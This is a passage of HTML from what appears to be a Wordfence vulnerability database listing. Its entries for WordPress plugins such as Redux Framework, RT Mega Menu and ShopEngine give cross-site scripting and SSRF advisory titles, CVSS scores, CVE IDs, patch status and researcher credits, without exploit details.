														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f6df3abe-ef27-46d7-bbdd-abd994fce132" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ca5b1ff6-19c5-4384-ae63-faf1f40122e7" target="_blank" rel="noopener">Redux Framework &lt;= 4.5.13 &#8211; Authenticated (Subscriber+) Cross-Site Scripting via User Input</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-5400" target="_blank" rel="noopener noreferrer">							CVE-2026-5400						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/redux-framework" target="_blank" rel="noopener">Redux Framework</a> <span class="wfvr-software-slug">[redux-framework]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e0f701652a71213d4d5afd11c6694ce0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e0f701652a71213d4d5afd11c6694ce0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener">h0xilo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ca5b1ff6-19c5-4384-ae63-faf1f40122e7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/116c57c2-6257-40b3-a838-194f8959be16" target="_blank" rel="noopener">Redux Framework &lt;= 4.5.13 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting via Spinner Field Input</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-5410" target="_blank" rel="noopener noreferrer">							CVE-2026-5410						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/redux-framework" target="_blank" rel="noopener">Redux Framework</a> <span class="wfvr-software-slug">[redux-framework]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc-huynh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/33af58759a2231f0c6ffdafd84ba15df.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="33af58759a2231f0c6ffdafd84ba15df"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc-huynh" target="_blank" rel="noopener">Luc Huynh from Noventiq RedTeam</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/116c57c2-6257-40b3-a838-194f8959be16" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4302ab90-f827-4e25-b72f-d41542d3bad3" target="_blank" rel="noopener">RT Mega Menu &lt;= 1.5.1 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting via rtmega_update_menu_options AJAX Action</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14855" target="_blank" rel="noopener noreferrer">							CVE-2026-14855						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rt-mega-menu" target="_blank" rel="noopener">RT Mega Menu – Mega Menu Builder for Elementor &amp; Gutenberg</a> <span class="wfvr-software-slug">[rt-mega-menu]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mitchell" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c10dbe06f111ce709fdc2628e94ac9a1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c10dbe06f111ce709fdc2628e94ac9a1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mitchell" target="_blank" rel="noopener">Mitchell</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4302ab90-f827-4e25-b72f-d41542d3bad3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/024d5962-0e8f-43cb-90dc-c282a5e436f2" target="_blank" rel="noopener">RT Mega Menu &lt;= 1.5.2 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;pointer_menu_item&#8217; Block Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15650" target="_blank" rel="noopener noreferrer">							CVE-2026-15650						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rt-mega-menu" target="_blank" rel="noopener">RT Mega Menu – Mega Menu Builder for Elementor &amp; Gutenberg</a> <span class="wfvr-software-slug">[rt-mega-menu]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/024d5962-0e8f-43cb-90dc-c282a5e436f2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/52a92e3c-cb64-4fc5-9248-6f4fc2a6a3cc" target="_blank" rel="noopener">Strong Testimonials &lt;= 3.3.8 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;lightbox_class&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-92622" target="_blank" rel="noopener noreferrer">							CVE-2026-92622						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/strong-testimonials" target="_blank" rel="noopener">Strong Testimonials</a> <span class="wfvr-software-slug">[strong-testimonials]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pbsec" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7f4bd9017dada52c54654420190e89ba.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7f4bd9017dada52c54654420190e89ba"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pbsec" target="_blank" rel="noopener">pb&gt;sec</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/52a92e3c-cb64-4fc5-9248-6f4fc2a6a3cc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/acd7b1b5-9618-4e8a-b320-bb65978d2c92" target="_blank" rel="noopener">The ShopEngine Elementor WooCommerce Builder Addon – All in One WooCommerce Solution with eCommerce Templates &amp; Woo Widgets  &lt;= 4.9.5 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;shopengine_product_title_header_size&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85575" target="_blank" rel="noopener noreferrer">							CVE-2026-85575						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shopengine" target="_blank" rel="noopener">ShopEngine Elementor WooCommerce Builder Addon – All in One WooCommerce Solution with eCommerce Templates &amp; Woo Widgets</a> <span class="wfvr-software-slug">[shopengine]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/romain-deperne" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c54963ce7f0451af98c05e1b494dc7ea.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c54963ce7f0451af98c05e1b494dc7ea"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/romain-deperne" target="_blank" rel="noopener">Romain Deperne (ang3L)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/acd7b1b5-9618-4e8a-b320-bb65978d2c92" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9011c84a-e4e5-460c-ab5e-f4451ab3cb07" target="_blank" rel="noopener">Unlimited Elements For Elementor &lt;= 2.0.19 &#8211; Authenticated (Contributor+) Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66608" target="_blank" rel="noopener noreferrer">							CVE-2026-66608						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/unlimited-elements-for-elementor" target="_blank" rel="noopener">Unlimited Elements For Elementor</a> <span class="wfvr-software-slug">[unlimited-elements-for-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ayukiab" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7a92419c78a0e5709d91cfa2ce19447d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7a92419c78a0e5709d91cfa2ce19447d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ayukiab" target="_blank" rel="noopener">Ayukiab</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9011c84a-e4e5-460c-ab5e-f4451ab3cb07" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/eaa33acc-75a5-48c6-8891-cc037b88d246" target="_blank" rel="noopener">Visualizer &lt;= 4.0.7 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86784" target="_blank" rel="noopener noreferrer">							CVE-2026-86784						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/visualizer" target="_blank" rel="noopener">Visualizer – Tables &amp; Charts Manager with Built-in AI Generator</a> <span class="wfvr-software-slug">[visualizer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/04dc25fcada9520afe8fb170e539d8b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="04dc25fcada9520afe8fb170e539d8b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener">Yaswanth Reddy Sunkara</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/eaa33acc-75a5-48c6-8891-cc037b88d246" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/04b9c0c4-3f1a-4984-9b24-6de3dc78bde0" target="_blank" rel="noopener">VK All in One Expansion Unit &lt;= 9.118.0 &#8211; Authenticated (Author+) Stored Cross-Site Scripting via &#8216;vkExUnit_cta_img_position&#8217; Post Meta</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17586" target="_blank" rel="noopener noreferrer">							CVE-2026-17586						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/vk-all-in-one-expansion-unit" target="_blank" rel="noopener">VK All in One Expansion Unit</a> <span class="wfvr-software-slug">[vk-all-in-one-expansion-unit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chairat-toraya" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/dd825c1225bd78591f13551a4eebb63a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dd825c1225bd78591f13551a4eebb63a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chairat-toraya" target="_blank" rel="noopener">Kyokito</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c0d3936ce2491c1bd33db966cf5421b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0d3936ce2491c1bd33db966cf5421b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener">Athiwat Tiprasaharn (Jitlada)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/048e7871de77533583773e0172b337bc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="048e7871de77533583773e0172b337bc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener">Itthidej Aramsri (Boeing777)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/04b9c0c4-3f1a-4984-9b24-6de3dc78bde0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7e328f1d-687d-424f-aab7-343bcece90cd" target="_blank" rel="noopener">WP Composer &lt;= 1.0.5 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;pbwp_raw_shortcode&#8217; Shortcode</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-2422" target="_blank" rel="noopener noreferrer">							CVE-2026-2422						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/page-builder-wp" target="_blank" rel="noopener">WP Composer – The Easiest Page Builder</a> <span class="wfvr-software-slug">[page-builder-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c0d3936ce2491c1bd33db966cf5421b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0d3936ce2491c1bd33db966cf5421b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener">Athiwat Tiprasaharn (Jitlada)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7e328f1d-687d-424f-aab7-343bcece90cd" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5b91bb81-b5e4-4a50-833b-e2e98ccc09ff" target="_blank" rel="noopener">WPComplete &lt;= 2.9.9.0 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8217;empty&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77820" target="_blank" rel="noopener noreferrer">							CVE-2026-77820						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpcomplete" target="_blank" rel="noopener">WPComplete</a> <span class="wfvr-software-slug">[wpcomplete]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5b91bb81-b5e4-4a50-833b-e2e98ccc09ff" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1e32c5e4-d83e-4d3a-9681-74dbde0ae66e" target="_blank" rel="noopener">Xpro Elementor Addons &lt;= 1.7.8 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84088" target="_blank" rel="noopener noreferrer">							CVE-2026-84088						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/xpro-elementor-addons" target="_blank" rel="noopener">Xpro Addons — 150+ Widgets for Elementor</a> <span class="wfvr-software-slug">[xpro-elementor-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/54998c6d0860cc6e1f5fee1e7efedb56.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="54998c6d0860cc6e1f5fee1e7efedb56"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener">Dmitrii Ignatyev</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1e32c5e4-d83e-4d3a-9681-74dbde0ae66e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2406db9d-ab51-4a16-83ba-5076135a0369" target="_blank" rel="noopener">YayPricing – WooCommerce Dynamic Pricing &amp; Discounts &lt; 3.5.7 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87888" target="_blank" rel="noopener noreferrer">							CVE-2026-87888						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/yaypricing" target="_blank" rel="noopener">YayPricing – WooCommerce Dynamic Pricing &amp; Discounts</a> <span class="wfvr-software-slug">[yaypricing]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a></div>
</p></div>
